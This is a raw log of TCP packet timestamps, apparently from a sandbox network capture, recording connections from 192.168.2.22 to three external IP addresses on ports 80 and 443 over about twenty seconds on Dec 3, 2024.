                                                                                                                                                                                  Dec 3, 2024 14:01:12.179506063 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.185086012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.185148001 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.185206890 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.185251951 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.190901995 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.190956116 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.191054106 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.191088915 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.196628094 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.196685076 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.196731091 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.196765900 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.202367067 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.202440023 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.202482939 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.202527046 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.208064079 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.208112001 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.208209038 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.208249092 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.213888884 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.213953972 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.213999033 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.214039087 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219013929 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219079018 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219083071 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219118118 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223721027 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223771095 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223845959 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223880053 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228200912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228256941 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228348017 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228394985 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232701063 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232753992 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232836008 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232872009 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237071037 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237124920 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237198114 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237237930 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241288900 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241353035 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241441965 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241488934 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245312929 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245367050 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245486975 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245536089 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249233961 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249291897 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249377012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249414921 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253158092 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253211975 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253249884 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253285885 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.256911993 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.256964922 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.257062912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.257107019 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.260821104 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.260906935 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478698015 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478749990 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478813887 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.479228020 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.479239941 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.368973017 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.372487068 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.502137899 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.502166986 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.509546995 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.509562016 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.535367012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.536386967 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083662033 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083741903 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083758116 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083781958 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.084098101 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.084114075 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.641465902 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:18.762655020 CET8049171142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.762743950 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306355953 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306404114 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306510925 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359359980 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359414101 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359492064 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.389704943 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.389727116 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.397936106 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.397972107 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.749202013 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.111435890 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.111535072 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117516041 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117536068 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117958069 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.118016958 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.121040106 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.121138096 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167068005 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167095900 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167565107 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167624950 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.223129034 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.267338991 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859143019 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859215975 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859230995 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859263897 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859273911 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859306097 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.861141920 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.861165047 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.863056898 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.863543987 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983505964 CET8049171142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983648062 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983814955 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983941078 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.986196041 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:22.106087923 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:23.117733002 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:23.117892027 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:27.490197897 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:27.490261078 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:33.118967056 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:33.119043112 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:33.119108915 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:33.120475054 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:33.120491982 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.382890940 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.383023024 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.387465000 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.387487888 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.387803078 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.442260027 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.483338118 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.821624994 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.822601080 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.822654963 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.822683096 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.823371887 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.823406935 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.823417902 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.823426962 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.823457956 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.831020117 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.839556932 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.839642048 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.839658976 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.848107100 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.848185062 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.848205090 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.942662001 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:34.942744017 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:34.942780972 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.024112940 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.024233103 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.024264097 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.027740002 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.027821064 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.027832031 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.038321972 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.038407087 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.038423061 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.046093941 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.046154022 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.046165943 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.053894997 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.053958893 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.053972960 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.069303989 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.069377899 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.069391966 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.077094078 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.077135086 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.077174902 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.077186108 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.077228069 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.084868908 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.090949059 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.091038942 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.091053963 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.096868038 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.096966028 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.096980095 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.102580070 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.102652073 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.102663994 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.225296974 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.225450993 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.225486994 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.227387905 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.227451086 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.227474928 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.232228041 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.232290983 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.232316971 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.241225004 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.241286993 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.241288900 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.241319895 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.241364002 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.245703936 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.250133991 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.250196934 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.250217915 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.250252008 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.250292063 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281572104 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281586885 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281620026 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281630039 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281665087 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281697035 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281697035 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281714916 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281729937 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.281758070 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.284802914 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.312958956 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.312972069 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.313024044 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.313304901 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.313354015 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.434345007 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.434376001 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.434484005 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.434516907 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.434590101 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.454890966 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.454916000 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.455018044 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.455054045 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.455068111 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477174044 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477205992 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477288008 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477323055 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477354050 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.477354050 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499205112 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499228954 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499289036 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499336004 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499360085 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.499360085 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518353939 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518385887 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518421888 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518456936 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518471003 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.518471003 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540638924 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540661097 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540766954 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540802002 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540848970 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.540894985 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634008884 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634041071 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634094954 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634129047 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634149075 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.634149075 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.650165081 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.650192976 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.650253057 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.650285006 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.650316954 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664737940 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664758921 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664819002 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664854050 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664869070 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.664869070 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677480936 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677511930 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677567005 CET49176443192.168.2.22151.101.65.137
